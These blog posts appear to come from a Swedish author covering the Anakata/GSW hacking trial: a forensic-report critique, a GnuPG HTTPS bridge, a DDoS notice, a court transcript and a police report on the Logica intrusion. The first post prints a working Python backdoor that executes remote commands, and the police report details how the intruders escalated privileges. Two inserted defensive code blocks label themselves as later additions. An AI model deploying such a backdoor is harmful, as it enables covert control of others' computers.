anakata’s uncontrollable computer

September 5th, 2013 by qnrq

IT security specialists working for the Swedish Security Service’s Department of Information Security and Preservation of Evidence in IT Environments performed a forensic analysis of a computer seized from GSW, specifically seizure 2012-0201-BG25023-26, and concluded that it would be impossible to remotely control it without leaving traces. The problem is that they are wrong. The investigation report was originally written in Swedish; my translated version can be downloaded here.

The forensic analysis was confined to the assumption that computers can only be remotely controlled via legitimate remote control services, such as Terminal Services and PowerShell. It focused on the services mentioned by the defendant and thus bypassed the possibility that, just like Nordea’s and Logica’s computers, the seized computer might simply have been hacked without the defendant’s knowledge, in the same way that Logica was undetectably hacked for at least two years.

Yesterday, when Jacob Appelbaum was heard as an expert witness called by the defense, the author of the report admitted that not all contents of the seized computer’s hard drive had been analyzed and that he is not a Windows expert.

The analysis assumes that only one firewall was present in the network, Windows Firewall, despite there being records of a “plastic cover belonging to router” being handed over to Swedish authorities by Cambodian authorities. The router’s model and firmware settings are unknown, as it has been neither documented nor analyzed. Apparently seizing the plastic cover was a higher priority.

In their investigation the Security Service shows that Adobe Flash Player versions 11.0r1, 11.2.d202, 11.3.r300, 11.3.r400 and 11.3.402 had full permissions in the seized computer’s Windows Firewall rules to communicate over both TCP and UDP on any port in any direction. These versions of Adobe Flash Player are vulnerable to over 100 security issues that can be exploited to execute code through so-called remote code execution exploits.

The computer’s Windows Firewall also allowed the Python interpreter, just like all the other whitelisted applications, to communicate over both TCP and UDP on any port and on any network device. Without going into further details in this post, here is a simple example of how a computer can be remotely controlled without leaving traces via Python:

import socket, subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind to port 9999 (example) on any network device
s.bind(("", 9999))
s.listen(1)
# Accept a connection from a client
conn, addr = s.accept()
print("[+] Connection established")

# Loop forever
while 1:
  # Read command sent from client
  data = conn.recv(1024)
  # Close link if no command is received
  if not data: break
  # Execute received command
  output = subprocess.check_output(data.decode().rstrip())
  # Send output of executed command back to the client
  conn.send("OUTPUT\n------\n".encode())
  conn.send(output)

conn.close()

When run, the script above creates a socket listening on port 9999 that accepts connections on any network device on the computer. It then waits for clients to connect, reads the received commands, executes them and returns the command output to the client. It’s not even complicated.

As an example this is what it looks like when a client connects to the server and lists the files in the current directory:

> telnet localhost 9999
Connected to localhost.
Escape character is '^]'.
ls
OUTPUT
------
server.py

In addition, the same scenario applies to another piece of software which was both installed and fully allowed in the local firewall: Neko.

Additionally, the computer had both the OpenVPN client and server software installed, enabling outsiders to connect to the computer and the computer to be connected to additional networks, forming a Virtual Private Network, which is a globally routed virtual LAN. By connecting directly to the computer, or by connecting the computer to an existing VPN, other clients in the same VPN can share local resources, like hard drive storage, across the network.

Essentially it all boils down to this: it is up to the software that provides the remote control functionality to save logs to the hard drive. If the programmer doesn’t explicitly write such logging functionality, as in the Python example above, logs are simply not stored on disk. Windows does not write every transmitted network bit to disk, and unless someone logs their own backdooring it is not going to be detected through forensics. Nor is the Python example above detected by antivirus software, as it performs completely normal network operations.
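The firewall whitelist that the report itself documents is something a defender can audit mechanically instead of reasoning about by hand. The following is an added example written for this post, not code from the original post or from the Security Service’s report: it parses output in the layout of `netsh advfirewall firewall show rule name=all verbose` (the sample below is constructed in that format, with rule names and paths modelled on the Flash and Python rules the report lists) and flags enabled allow rules that permit any protocol or any port to any address, marking those whose program is an interpreter or plugin, since such a rule turns the program into a general-purpose network primitive.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample in the layout of "netsh advfirewall firewall show rule
# name=all verbose": two broad rules like the ones the report lists, plus one
# tight rule for contrast.
SAMPLE_NETSH_OUTPUT = r"""
Rule Name:                            Adobe Flash Player 11.3 r300
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             Any
Edge traversal:                       No
Program:                              C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin.exe
Action:                               Allow

Rule Name:                            python
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            Any
RemotePort:                           Any
Edge traversal:                       No
Program:                              C:\Python27\python.exe
Action:                               Allow

Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             UDP
LocalPort:                            Any
RemotePort:                           53
Edge traversal:                       No
Program:                              C:\Windows\system32\svchost.exe
Action:                               Allow
"""

# Executables that run whatever they are fed: once such a program may use any
# port in any direction, the rule effectively says "anything may listen".
INTERPRETER_PATTERN = re.compile(r"python|neko|flash|powershell|cmd\.exe|w?script", re.I)


def parse_rules(text):
    """Turn netsh's "Key:   Value" blocks into one dict per rule."""
    rules, current = [], None
    for line in text.splitlines():
        if line.startswith("Rule Name:"):
            current = {"Rule Name": line.split(":", 1)[1].strip()}
            rules.append(current)
        elif current is not None and ":" in line and not line.startswith("-"):
            key, _, value = line.partition(":")  # first colon only, so C:\ paths survive
            current[key.strip()] = value.strip()
    return rules


def _is_any(value):
    return value.strip().lower() in ("", "any")


def is_unrestricted_allow(rule):
    """True for an enabled allow rule with no port and no address restriction."""
    if rule.get("Action", "").lower() != "allow" or rule.get("Enabled", "").lower() != "yes":
        return False
    ports_open = _is_any(rule.get("Protocol", "Any")) or (
        _is_any(rule.get("LocalPort", "Any")) and _is_any(rule.get("RemotePort", "Any"))
    )
    return ports_open and _is_any(rule.get("LocalIP", "Any")) and _is_any(rule.get("RemoteIP", "Any"))


def audit_firewall_rules(text):
    """Return the risky rules with direction, program file name and whether that
    program is an interpreter or plugin that can be driven to run arbitrary code."""
    findings = []
    for rule in parse_rules(text):
        if not is_unrestricted_allow(rule):
            continue
        program = PureWindowsPath(rule.get("Program", "")).name
        findings.append({
            "rule": rule["Rule Name"],
            "direction": rule.get("Direction", "?"),
            "program": program,
            "interpreter": bool(INTERPRETER_PATTERN.search(program)),
        })
    return findings


if __name__ == "__main__":
    for f in audit_firewall_rules(SAMPLE_NETSH_OUTPUT):
        tag = "INTERPRETER" if f["interpreter"] else "broad"
        print(f"[{tag}] {f['rule']!r} {f['direction']} {f['program'] or '(no program)'}")
```

An inbound rule for an interpreter is exactly what lets a listener like the script above accept connections; on a live machine, pair this audit with a listing of listening sockets, since the disk holds no record of the session itself.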

You can obtain my somewhat lengthy comments on this matter here. Please keep in mind that they were written under somewhat stressful circumstances, where technical facts were prioritized over linguistic expression and spelling.

With more than 100 ways to remotely control the defendant’s computer without leaving traces, counting only the circumstances that make up the environment described in the Security Service’s own investigation, it is absurd to claim that it would be impossible to remotely control the seized computer without leaving traces.

The authorities worked around the prerequisites of justice when they first seized a router’s plastic cover instead of the router itself and later focused selectively on Windows Firewall. Analyzing the plastic cover would have had the same relevance as the investigation of remote control possibilities conducted by the Swedish Security Service.

Making the possible seem impossible is easy when the defendant’s documents are locked in a secret cabinet and nobody has the ability to question you, but such actions do not bring out what is actually possible. It seems like the investigators were biased.

Solving the browser crypto problem

July 14th, 2013 by qnrq

Many developers have worked hard to port critical cryptographic functionality to JavaScript. We all agree that a safer world clearly requires asymmetric crypto support on the web. Porting code to JavaScript is great for users who don’t really care about the strength but only that the data is encrypted. Those people usually believe that they do not need perfect crypto; as long as it is any form of crypto it is “good enough” for them.

There are many problems with porting cryptographic functions directly to JavaScript, and we see many great ideas failing to do things properly. JavaScript cryptography is very young compared to established binary solutions, such as GnuPG, that have been audited for a long time. GnuPG has been around since 1999; GPG4Browsers, now OpenPGP.js, since 2011.

Auditing JavaScript ports leads to better design and fewer failures over time, but even when everything else has been solved some problems remain by design. Web browsers live in a very hostile world, and we systematically witness XSS vulnerabilities and 0day exploits that enable dumping critical data, like private keys, as soon as either the DOM or HTML5 local storage can be accessed. We can take care of badly implemented cryptography, but we can’t take care of the fact that JavaScript-implemented cryptography is accessible to anything that can execute JavaScript in the right environment. As long as cryptography is done in JavaScript this will always be a huge threat.

Users who care more about their security and privacy are demanding solutions aligned with their requirements, and JavaScript-implemented cryptography is insecure by design because of the threats surrounding its domain. These users actively choose not to use JavaScript-ported functionality and instead continue to use their local binaries, which have been around and audited for decades longer than the newborn ports. And they are completely correct in doing so, because how can we actually trust JavaScript? We are stepping over the security requirements in order to deliver working solutions faster than science can keep up. We are impatient and need something that works as soon as possible, especially in the modern day and age with the ongoing war against free, unmonitored online communication. By doing so we bypass the most important core ideas of implemented cryptography: security and privacy.

The solution

In order to expose GnuPG functionality to the web we must create an API for it that can perform cryptographic operations with non-sensitive elements, such as armored public keys and private key metadata, without exposing anything of importance. The best way to do this, and to integrate it successfully into web browsers, is to run a web server locally that pre-accepted, remotely served content can communicate with. The most important detail is that private keys should never be available to the web browser but instead reside in the local GnuPG keyring, which the API manipulates through the local GnuPG binary.

I came up with a solution that I named pygpghttpd, which I am currently working on supporting in my OpenPGP plugin for Roundcube, rc_openpgpjs. pygpghttpd is an open source, minimalistic HTTPS server written in Python. It exposes an API that lets GnuPG’s cryptographic functionality be used in web browsers and other software capable of making HTTP requests. pygpghttpd runs on the client’s localhost and allows the local GnuPG binaries to be called from the user’s browser securely, without exposing cryptographically sensitive data to hostile environments. It bridges the required elements of GnuPG to HTTP, allowing its cryptographic functionality to be called without the need to trust JavaScript-based PGP/GPG ports. As pygpghttpd calls the local GnuPG binaries it also uses the local keyrings and relies on GnuPG entirely for strength. In short, pygpghttpd is just a dummy task router between the browser and the GnuPG binary.

pygpghttpd acts as an HTTPS server listening on port 11337 for POST requests containing operation commands and parameters to execute. When a request is received it checks the “Origin” HTTP header, or if that is missing the “Referer” header, to find out which domain served the content that is contacting it. It then checks whether the domain has been added to the “accepted_domains.txt” file by the user, to ensure that it is only operational for pre-accepted domains. If the referring domain is accepted it handles the request and serves the result from the local GnuPG binary to the client. The response carries a Cross-Origin Resource Sharing (CORS) HTTP header informing the user’s browser that the request should be permitted. If the referring domain is missing from accepted_domains.txt, the user’s browser forbids the request in accordance with the same-origin policy.

The HTTPS certificate used by pygpghttpd is self-signed and is not intended to enhance security, since all traffic is isolated to the local network interface. HTTPS is used so that both HTTPS- and HTTP-delivered content can interact with it.

pygpghttpd exposes metadata for both private and public keys but only allows public keys to be exported from the local keyring. The metadata for private keys is enough for performing cryptographic actions. Complete keypairs can be generated and imported into the local keyring.
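The Origin/Referer allow-list check described above is the part of pygpghttpd that decides which web content gets to drive the local keyring, so it is worth spelling out exactly. The following is an added example written for this post, not pygpghttpd’s own code; it assumes an accepted_domains.txt with one origin per line (a constructed one is embedded) and compares complete origins, that is scheme, host and port, so that a look-alike host such as accepted.domain.com.evil.example, or a Referer that merely mentions the accepted domain in its query string, is refused.

```python
from urllib.parse import urlsplit

# Constructed stand-in for the user's accepted_domains.txt: one origin per line,
# blank lines and "#" comments ignored. A bare host is taken to mean https.
ACCEPTED_DOMAINS_TXT = """\
# sites whose scripts may call the local GnuPG bridge
https://accepted.domain.com
mail.example.org:8443
"""

DEFAULT_PORTS = {"http": 80, "https": 443}


def normalize_origin(url):
    """Reduce an Origin or Referer value to scheme://host[:port] (lower-cased,
    default port dropped). Returns None for "null", missing schemes, file:// etc."""
    try:
        parts = urlsplit(url.strip())
        host, port = parts.hostname, parts.port  # .port raises ValueError on junk
    except ValueError:
        return None
    if parts.scheme not in DEFAULT_PORTS or not host:
        return None
    if port is None or port == DEFAULT_PORTS[parts.scheme]:
        return f"{parts.scheme}://{host}"
    return f"{parts.scheme}://{host}:{port}"


def load_accepted_domains(text):
    """Parse accepted_domains.txt into a set of normalized origins."""
    accepted = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if "://" not in line:
            line = "https://" + line
        origin = normalize_origin(line)
        if origin:
            accepted.add(origin)
    return accepted


def requesting_origin(headers):
    """Origin header first; Referer only when Origin is absent, as the post describes."""
    lookup = {name.lower(): value for name, value in headers.items()}
    if "origin" in lookup:
        return normalize_origin(lookup["origin"])
    if "referer" in lookup:
        return normalize_origin(lookup["referer"])
    return None


def cors_allow_origin(headers, accepted):
    """Value for the Access-Control-Allow-Origin response header, or None to refuse.
    The accepted origin is echoed back verbatim; a wildcard would let any site in."""
    origin = requesting_origin(headers)
    if origin is not None and origin in accepted:
        return origin
    return None


if __name__ == "__main__":
    accepted = load_accepted_domains(ACCEPTED_DOMAINS_TXT)
    for hdrs in ({"Origin": "https://accepted.domain.com"},
                 {"Referer": "https://evil.example/?next=https://accepted.domain.com"}):
        print(hdrs, "->", cors_allow_origin(hdrs, accepted))
```

Note what this check does and does not do: it relies on the browser enforcing CORS, and any local process can set Origin itself, exactly as the cURL example further down does, so the list limits which sites’ scripts can reach the bridge, not which local programs can.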

For example, generating a keypair with cURL:

curl -k --data "cmd=keygen&type=RSA&length=2048&name=Alice&email=alice@foo.com&passphrase=foobar" -H "Origin: https://accepted.domain.com" https://localhost:11337/

Or from JavaScript:

$.post("https://localhost:11337/", {
  cmd: "keygen",
  type: "RSA",
  length: "2048",
  name: "Alice",
  email: "alice@foo.com",
  passphrase: "foobar"
}, function(data) {
  if(data == "1")
    return true;
  return false;
});

Please see the project on GitHub, the API documentation and the example for full details.

Fending off attacks

June 18th, 2013 by qnrq

Dear readers,

As you may or may not have noticed, qnrq.se was inaccessible from Friday the 14th until Monday the 17th. The site was totally unavailable for 65 hours due to a powerful DDoS attack that knocked out my host’s cluster, on which the site resides (195.74.38.18). Downtime doesn’t affect me as a publisher: there is nothing here that is not backed up and I don’t intend to gain financially from the visitors of this site. Instead, it affects you as a reader. It affects your ability to access the information that is spread through this domain. This is a serious attack on your right to access information freely. Therefore I would like to address how this situation will be handled, to ensure that you can, at a bare minimum, always access the content that I provide.

There are no restrictions that prevent search engines and other crawlers from accessing content published on this site. If it goes down you can always view the content through, for example, Google’s cache or the Internet Archive. I have also installed and configured Cloudflare, which caches and delivers content through their CDN even when the site is inaccessible. Please keep in mind that Cloudflare is an American company which by law has to co-operate with the NSA and similar organizations. If you wish to hide your activities on this site from such organizations then please use an anonymization service like IPredator or Tor.

Cloudflare is the first non-Swedish service involved in delivering content on this site since I first put it online nearly two years ago. There are no Google Analytics or similar foreign services tracking you here. My host, Binero, is a Swedish company with its servers placed in Sweden. The Flattr buttons you see all over the site are served by a Swedish company with servers in Sweden. The Creeper icon in the menu on the right side is served by a Swedish server run by a group of Swedish open source fanatics. The top-level domain? Swedish. You get the point.

Limiting the site to being served from within Sweden’s borders has always been a conscious decision. Originally the publications were mostly limited to Sweden, and I didn’t want my visitors’ data to be sent to a lot of fishy people I know nothing about. Later the site grew in popularity, and I now have almost as many international visitors as Swedish ones.

I have to both fend off attacks and ensure acceptable performance. The site is run on a very limited budget, and implementing Cloudflare seems to be the best alternative from both a financial and a performance perspective. Introducing an American company into the chain isn’t exactly my dream scenario, but availability is important to me. Unfortunately this creates a conflict with users who care about their privacy, especially with regard to America.

I hope to satisfy both the performance and the privacy side by different means. I have stuck with the same host, Binero, for many years now, but the way they handled the recent DDoS is entirely unacceptable to me. I am not going to deal with a host that, purely on principle, requires me to contact them to move my site to a cluster that is not affected by the attack (“because it causes downtime for the already DDoSed customers”, they claimed). My attitude is that if I am paying somebody to deliver a service then I expect them to do everything in their power to ensure that the service is delivered, not to require me to walk extra miles for them and then wait three days for their support to react. Under those conditions I would much rather have as much as possible under my own control, and that’s the next phase.

I am breaking up with Binero and moving the site to a dedicated Swedish VPS. For security and other reasons I will abandon PHP on the new host and serve the WordPress-generated pages statically. Everything will remain the same for you as a reader in terms of accessing and reading. The positive side is that I won’t have to deal with intrusion attempts directed at PHP and WordPress, and Cloudflare will be configured to cache the static pages so that you can access them even when my host goes offline. The negative side is that you will no longer be able to leave comments on the site, but that may be fixed sometime in the future. When the site has been migrated to the new host it will also be available over HTTPS.

I believe that this is the best solution available, please let me know if you feel otherwise by commenting on this post.

Cheers, stay critical.

The extradition (Morgan part 7)

June 17th, 2013 by qnrq

Nacka District Court has granted prosecutor Henrik Olin permission to extradite Anakata to Denmark in accordance with the Danish arrest order. Anakata will remain in solitary confinement until the extradition is executed. Whether Anakata is allowed to contact the outside world is up to the prosecutor in the Swedish hacking and fraud charges, Henrik Olin.

The extradition can be executed on 25th June at the earliest, provided that the District Court finalizes the judgement in time. Prosecutor Henrik Olin decides, in co-operation with the Danish authorities, when the extradition shall be executed. The District Court’s decision can be appealed to the Swedish Court of Appeal.

Morgan the Trial (part 6)

June 1st, 2013 by qnrq

Below is the translated transcription of the hearing of GSW regarding the charges related to the intrusions into Nordea Bank. The original Swedish recording can be downloaded here.

Day 5, 2013-05-31
11:00 Hearing of the defendant GSW (charge points 5-13)

OLIN: Thank you. I think Ola Salomonsson has already answered some of my questions, but I thought I would ask you to make some comments. Perhaps you would first like to say something in general about these charges.
GSW: Yes, well… I don’t know what more to say than that I don’t have anything to do with it.
OLIN: Then I would like to ask a little about… first the harddrive, point 2. On it there are traces of all kinds of datasets from Nordea, do you have any comments on that?
GSW: I’m not denying that they are there, I’m denying that I have put them there.
OLIN: Yes. And you heard my statement about these 14 different IP addresses that were relevant and the 13 direct occurrence and 14 indirect occurrences in the MacBook, point 26. A big portion of them was from the ISP Cogetel, which perhaps is a big provider in Cambodia or?
GSW: I actually don’t know that.
OLIN: No. You said earlier that you had used that ISP?
GSW: Yes exactly.
OLIN: And yes… Perhaps it’s not so easy, but do you recognize any of these IP addresses?
GSW: No. I can say that I recognize that they are from Cogetel based on the numbers they are starting with but… I don’t recognize them otherwise.
OLIN: This other Cambodian ISP, what was the name again… Maybe you know that better than I? Citylink and Digi, do you recog–
GSW: No, it’s nothing I recognize. I may have heard the names but I haven’t been a customer of them.
OLIN: Malmö Borgarskola, (inaudible) group, nothing you–
GSW: Never heard of them.
OLIN: No familiar names at all?
GSW: No.
OLIN: Returning to this Mysec content that we discussed in previous hearings. In the Mysec content, if I can express myself like that… The files connected to Mysec in your computer, there are 4 of these IP addresses that are connected to the intrusion against Nordea.
GSW: Which page?
OLIN: Oh no… Perhaps I am wrong a little bit I’m realizing, these IP addresses…
?: Which page?
OLIN: I am on page 130. Oh, okay. Sorry. I will reformulate the question. I think that you should interpret this on page 130 that after contact with Mysec and in data that they have delivered they have informed that 4 out of these 14 IP addresses connected to Cambodia have been discovered at Mysec. Do you have any comment?
GSW: I will begin by pointing out that Cogetel uses so called dynamic IP addresses, meaning the customer gets a new IP address every time he connects. So you have to look at the timestamp also.
OLIN: Yes. But you have connected to Mysec’s environment from your computer in Cambodia.
GSW: That’s correct.
OLIN: And you naturally don’t know which IP?
GSW: No.
OLIN: Especially considering they are dynamic?
GSW: Mm.
OLIN: And that your defense already answered to but I’ll ask anyway at the risk of being a bit repetitive, but regarding these transactions… these names of individuals and companies, is there anything that is familiar to you?
GSW: The first time I heard any of the names was during the interrogation on 8th March.
OLIN: The company called (inaudible)?
GSW: Never heard of it. I think on 8th March you asked about three recipients.
OLIN: During interrogations?
GSW: Exactly.
OLIN: Oh, OK. But now that you’ve heard all names you don’t have any..
GSW: No.
OLIN: No. I have no more questions, thank you.
Judge: Ola Salomonsson.
OLA: The question can seem a bit distant in relation to all these technical things… But I will begin by asking you, without going into personal things, how are you living in Cambodia during this time? How is it financially for you?
GSW: I didn’t have any financial problems. I was partially working, running a business down there.
OLA: And you had a lot of employees too?
GSW: Yes, in the previous year.
OLA: But at this time, more exactly during the summer 2012.
GSW: I was freelancing as a consultant and didn’t have any financial problems at all. I was getting money from my parents too.
OLA: Is it the same residence and same conditions as you said in earlier hearings?
GSW: Yes.
OLA: I mean with the guestroom and the computers and so forth.
GSW: Exactly.
OLA: There is no difference I think. Now… the technology isn’t so easy at least for me, but when you say that the ISP in this case had a dynamic timestamp or…
GSW: Dynamic IP address.
OLA: That’s right, dynamic IP address. What does that mean, explain a little bit.
GSW: It means that customers are assigned new IP addresses every time they connect.
OLA: OK. So that many different IP addresses are occurring…
GSW: That can both mean that one and the same computer has multiple IP addresses or that multiple computers have the same IP address. They only have it at the same time.
OLA: If we apply that on the fact that there are 14 different IP addresses here, does it have any value then?
GSW: No, not really.
OLA: No, OK. I said but perhaps it should also come from you, or perhaps that question was asked. But you didn’t recognize any of these companies…
GSW: No.
OLA: that the money has supposedly been sent to…
GSW: Nothing.
OLA: We have Iran here, now your computer might have been remotely accessed but do you have any connection there?
GSW: No, none.
OLA: Do you have any similar reflection as you had on the previous charge, a slight idea over which individual or group could be behind this?
GSW: This is closer in time so it’s easier to remember things that have happened and I have my suspicions of who could…
OLA: Is that going in the same direction as what we talked about previously?
GSW: Yes, it’s more or less the same.
OLA: More or less the same?
GSW: It’s the same.
OLA: I have thought, and of course you think a lot about this case, it’s a pretty large investigation but… I am wondering if it’s not you that is responsible for the intrusion and transactions then one can ask, and you have your suspicions, but is there anything in this material that you can point at that shows that you didn’t do it?
GSW: It’s hard to say that it’s not me except by saying that I don’t know anyone of those involved.
(OLA and GSW talking at the same time, inaudible.)
GSW: Besides that I can say that I actually had work to do and didn’t have time to sit and do these things.
OLA: Summer 2012?
GSW: Yes exactly.
OLA: Maybe it doesn’t take so long to do this but you can tell anyway, what are you doing when you are busy?
GSW: I am freelancing as a consultant doing graphical development and other…
OLA: Mm, and it was a little bit what you said earlier.
GSW: Exactly.
OLA: So to say you were active summer 2012.
GSW: Yes.
OLA: One can either way ask, since we are specifically asking about the summer 2012, even though the intrusions happened a short while before that, were you physically in Phnom Penh where the computers stood?
GSW: Yes I was.
OLA: You know that you were?
GSW: Yes.
OLA: Have you had any guests at all?
GSW: I have had many.
OLA: Even during this timeframe?
GSW: Exactly. Also people that have been living there for longer periods. I had, like I said, a pretty large apartment very centrally so people often came to the city when living somewhere else in Cambodia or were temporarily in Cambodia and lived in my apartment instead of renting a hotel room.
OLA: I asked the question to the prosecutor if the intrusions and data transfers had to be made (inaudible) is there anything in that regard that you want to inform or say?
GSW: I have nothing to do with neither the intrusions nor the data transfers so I can just generally point out that it doesn’t have to be the same person.
OLIN: One more question from my side.
JUDGE: Go ahead.
OLIN: You don’t have any obligations to prove your innocence of course, Gottfrid. But now both under this charge and the previous one you have repeated these suspicions that you have, when you’ve said one part don’t you want to say the second part and give some more information about your suspicions?
GSW: Now I will speak personally from the heart so to say. You must understand that here you come and first you talk about several years in prison. Do you know what happens to so called snitches in prison?
OLIN: It’s not my part to answer any questions right now but I understand your viewpoint.
GSW: You have to understand that I can’t expose myself to the obvious risk losing life and limb. It’s also quite large sums of money so it’s very likely that the actual offenders would go after me if I…
OLIN: So your own security is the reason why you don’t want to say anything more. I respect your answer, that’s what I wanted an answer to. Thank you.
OLA: To add on the same theme, there are even journalists that have called me, not only one but pretty many, but people are wondering a little about whether you’ve been threatened or are afraid of threats from individuals or groups, have there been any?
GSW: I haven’t received any concrete threats, no.
OLA: This with the computer world, hackers breaking into every mainframe and banks and transfer money, this can spontaneously possibly be connected to international crime and serious crime…
GSW: It’s a little bit why I brought up this with that different people can have done the hackings and transfers.
OLA: I can imagine that this is extremely organized.
GSW: Exactly.

Morgan the Trial (part 5)

May 19th, 2013 by qnrq

The trial against Anakata and his alleged co-conspirators begins tomorrow and is scheduled to run until 6th June. In case you’ve missed it, WikiLeaks published all related documents today. The prosecution documents, which the Swedish government declined to hand out in digital format, have thus gone fully public.

The loud voices that were panicking Cambodian authorities into deporting Gottfrid aren’t echoing in the prosecution. The alleged danger was certainly hyped; a wise tactic if the goal is to withdraw somebody from another country as fast and quietly as possible, however unwise if the authorities wished to act in accordance with their own laws.

“Sweden has donated money to Cambodia since 1979, shut up with your tinfoil fashion”, says the critic. Yes, but in what amounts? According to figures published in 2009 by SIDA, Sweden originally planned to donate 241 255 000 SEK to Cambodia in 2012. In 2010 Sweden donated 24 million USD, and 25.5 million USD in 2011. In 2012, the year of Gottfrid’s arrest in Cambodia, the financial aid grew by 32.15% compared to 2011, to 33.7 million USD. Quite a large increase considering the 6.25% increase between 2010 and 2011. The financial aid that Cambodia received from Sweden in 2012 is the largest in history.

Of course there are other parameters to take into consideration, such as economic development, but when the Cambodian Interior Minister travels to Stockholm only one week after he signed Gottfrid’s deportation order, it is quite natural to raise questions. In fact it is so natural that even the officials of the Swedish Ministry for Foreign Affairs are being prepared to answer those questions, and the Swedish Embassy staff are pointing out that the coincidence is an “interesting detail”. Smile and wave boys, smile and wave.

A state does not simply and legally deny somebody their right to an attorney, and lie to and mislead those who wish such rights to be granted. By their own account, the Swedish embassy and the Ministry for Foreign Affairs were originally unsure whether they would be able to retrieve Gottfrid in the first place. Fully understandable, considering that upon deportation the deportee has a choice of destination and also various legal rights, such as access to lawyers and court proceedings, things that were never on offer for Gottfrid. The Swedish authorities intended to act as quickly as possible in the shadow of their own biased classifications. We mortals are told to get with the system and stop questioning, or face the never-ending troublemaker labeling.

In order to raise the panic levels the government is saying that people have been harmed in these alleged intrusions. When asked directly, the Swedish tax agency couldn’t estimate whether it hurt anybody. The government wrote in its statements that people with protected identities were being put at risk by the leaked so-called person numbers. These are entirely public in Sweden and can’t be put to much use. The same information that was allegedly stolen from Logica’s mainframes, the tax agency data, contains information that can be retrieved by calling the tax agency and asking for it.

Swedish person numbers are no secret; they are available anywhere, and the worst thing you can do with one is change somebody’s name or address, like when someone changed the name of Antipiratbyrån’s lawyer Henrik Pontén to Pirate Pontén. Actual harm and annoyance can undoubtedly be caused by using person numbers in malicious ways, but once again they are entirely public. If it is such a big problem that people can cause harm with person numbers, then why doesn’t the tax agency start, hm, let’s say, verifying the critical things that can be done with one’s person number to begin with? These are problems that exist far outside the hacker scope.

The alleged harm is of course made up to weigh in sync with the amount of money that the affected private companies and government agencies spent on their investigations, not the actual harm caused to individual members of society.

It’s actually about time that something like this happened. People are always boasting about how anything can be hacked, but at the end of the day very few citizens reflect on whether it is wise to trust the government. After all, they are repeating what their trusted vendor has told them, who in turn is repeating what their own trusted vendor has told them, and so forth. The citizens trust a government to protect their data, and in turn the government outsources the data to private companies that configure their mainframes to forbid passwords mixing uppercase and lowercase characters and then cap them at 8 characters. Best of all, all these mainstream media articles about password policies and security? Turns out Sweden protected its tax agency datasets without any password policy at all. The government is just a brand used to vouch for multiple companies whose structures are too complex for the average citizen to gain a broad understanding of. We elect a government because we are lazy. Our own laziness is repeatedly making bad decisions for us.

The tip of Mount Problem is that these problems are everywhere. System administrators, governments and companies don’t care that your data is lost because it’s lost; they care because if you find out about it then you might choose someone else to provide your services, and they’ll start losing customers and votes. Governmental trust is the lowest level of marketing, because the general public trusts it to make the right decisions in most cases by default, due to the governmental branding.

The biggest threat of exposing them is that they lose trust. They are not protecting you. If you aren’t protecting yourself then nobody is. Banks and governments have repeatedly proven that they would rather keep cyber attacks secret than expose them and risk losing your trust, which, you have to keep in mind, is what they convert into profit. Keeping cyber attacks secret paradoxically benefits the attackers just as much as the government.

Now vote like it matters.

Logica, National Special Event: Morgan (part 4)

May 3rd, 2013 by qnrq

[image: axex]

0201-K81864-12 Notification Letter from Axex

Translated version of Axex’s police report for Applicate.

Contact details
2012-03-19

Reporter:
Yv*nn* W*stm*n, CEO
Infodata Applicate AB
556436-3421
Box 34101
100 26 STOCKHOLM

(The reporter requests that the report is classified if possible since publicity about the event can affect the company more than the event itself. The reporter requests to receive a copy of the report sent to them.)

CEO Yv*nn* W*stm*n describes the situation at Logica as “panicky”.
Responsible person at Logica is

J*h*n R*p*, C of Operations
Logica Sverige AB
073-xxx xx xx
He has overall responsibility for Logica’s operations in Sweden.
CEO Yv*nn* W*stm*n requests that the Security Service speaks to him if possible before he takes any panicky actions.

Introduction
Axex co-operates with Infodata Applicate AB in security related matters. The company has recently been attacked by hackers and has requested us to report the event.

Infodata Applicate AB, 556436-3421, wants to report hacking where somebody unknown has gained access and stolen information from their servers in the network.

Procedure
Somebody has illegally downloaded information from Applicate. Logica is the company that supplies Applicate infrastructure. The attack has been made through Logica’s web application and from information received they have also accessed mainframes (which requires special knowledge).
In connection with the intrusion of Infotorg’s web applications the intruders have used Monique Wadstedt’s account. She is the lawyer that represented the American entertainment companies that were one of the parties in the Pirate Bay trial. Outgoing traffic has been going to two IP addresses at an ISP called Cogetel in Phnom Penh, Cambodia, Bahnhof and a Tele2 mobile connection.

During the intrusion the attackers have downloaded, amongst others, social security numbers for protected identities from 2007 (without names or other information). They have also downloaded the entire SPAR database including historical data from 4 years back in time.
It is estimated that 1.7 Tb information has been transferred out of Applicate’s storage servers.

Description
On the 3rd-4th March 2012 Applicate’s IT manager noticed increased activity and load which exceeded the normal level in the mainframes which they use. The increase wasn’t dramatic and they were unsure of what the reasons were.
Pretty soon IT personnel found that there was abnormal activity in the network.

Closer investigation found that an account belonging to a sales person at Applicate had performed 1600 transactions under one hour, which is impossible to do manually. They also found abnormal searches made by the same account.
Controls showed that the owner had not been at their or somebody else’s computer with access to the system. The account owner had been in sales meetings at the point of time.

Additional studies showed traces of FTP traffic and exportation of text files which is very rare at Applicate. One could also detect that Telnet communication started against the mainframe resources which is not normal.
Applicate made the conclusion that they were attacked and that somebody had accessed their servers.

By investigating the search queries made by the compromised user account they found that the permissions for the account had been increased and that some strings included in the code for permissions could only originate from Logica.

There are also details that Logica Sweden is about to fire up to 450 employees as a saving measure.

Applicate has also found that the attackers used one of Logica’s group manager’s user account in their office in Bromölla to gain illegal access to information.

More extensive investigations were carried out and they showed that the attackers had hacked into and stolen information from the administrative permission system RACF in the mainframe. This system contains information about circa 100 000 users. They have also downloaded information from a system called PI, where information regarding permissions also occurs. These systems are in a UNIX mainframe environment.

Applicate has in its security work decreased the 200 accounts with highest permissions that have been found in the investigations to 2 accounts.

In its security work Applicate has found that somebody used Monique Wadstedt’s account. Wadstedt has had permissions and accounts in Applicate’s web interface that the intruders have remade and created a mainframe account with superuser permissions. The intruders have then used this access and permission to illegally download large amounts of files.
